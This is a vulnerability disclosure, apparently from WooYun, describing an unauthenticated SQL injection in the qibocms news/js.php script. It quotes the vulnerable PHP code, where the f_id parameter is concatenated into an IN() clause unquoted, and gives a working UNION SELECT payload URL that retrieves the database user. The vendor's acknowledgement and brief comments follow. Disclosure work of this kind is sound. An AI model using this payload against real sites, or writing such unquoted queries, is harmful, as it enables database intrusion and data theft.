qibocms 部分系统无需登录注入(demo成功)

不清楚哪些系统存在 以B2B演示 官方自己慢慢排查把。

http://**.**.**.**/bugs/wooyun-2010-053187

很久前的一个漏洞 这个漏洞的修复是直接去掉了urldecode

然后自己就放弃了。 今天再看到这个文件

继续看

news/js.php中

if($keyword){
    $SQL.=" AND ( ";
    //$keyword=urldecode($keyword);
    $keyword=filtrate($keyword);
    $detail=explode(" ",$keyword);
    unset($detail2);
    foreach( $detail AS $key=>$value){
     $detail2[]=" BINARY title LIKE '%$value%' ";
    }
    $str=implode(" OR ",$detail2);

可以看到这里把urldecode注释掉了 然后用filterate来过滤了。

那么这样就修复了上次的那个洞 所以这里就没办法了。

今天无意看到这上面的几行

12-24行左右

if($type=='hot'||$type=='com'||$type=='new'||$type=='lastview'||$type=='like')
 {
  if($f_id)
  {
   if(is_numeric($f_id)){
    $SQL=" fid=$f_id ";
   }else{
    $detail=explode(",",$f_id);
    $SQL=" fid IN ( ".implode(",",$detail)." ) ";
   
   }
  }

if(is_numeric($f_id)){
    $SQL=" fid=$f_id ";
   }else{
    $detail=explode(",",$f_id);
    $SQL=" fid IN ( ".implode(",",$detail)." ) ";
   
   }

当设置$f_id之后

如果不是数字的话 就先切为数组 然后再返回成字符串 但是这里 成字符串之后 没有添加单引号。

而且$f_id 并没有被intval 在全局文件中被intval的是$fid

这里的是$f_id 所以可以注入了。

官网测试

报错了 没单引号

构造一下

http://**.**.**.**/news/js.php?f_id=1) UNION SELECT 1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23&type=hot

成功出数据。

单引号之。

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-09-10 09:14

厂商回复：

感谢提出来

最新状态：

暂无

1. 2014-09-09 15:40 | 进击的zjx ( 普通白帽子 | Rank:1712 漏洞数:224 )

   1

   放开那些洞洞，让我来！ 你该好好看书才对- -！

   1# 回复此人

2. 2014-09-26 18:58 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ，菜渣， 菜呀！)

   0

   mark一下

   2# 回复此人